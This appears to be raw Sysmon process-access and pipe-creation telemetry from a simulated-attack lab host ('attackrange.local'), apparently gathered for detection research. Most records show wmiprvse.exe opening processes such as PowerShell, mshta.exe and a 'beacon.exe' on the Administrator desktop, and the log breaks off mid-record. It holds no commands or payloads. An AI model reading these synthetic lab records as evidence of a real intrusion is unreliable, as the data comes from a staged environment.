10341000x80000000000000002238840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002238834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.623{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560\PSHost.132591776244761270.10560.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002238833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT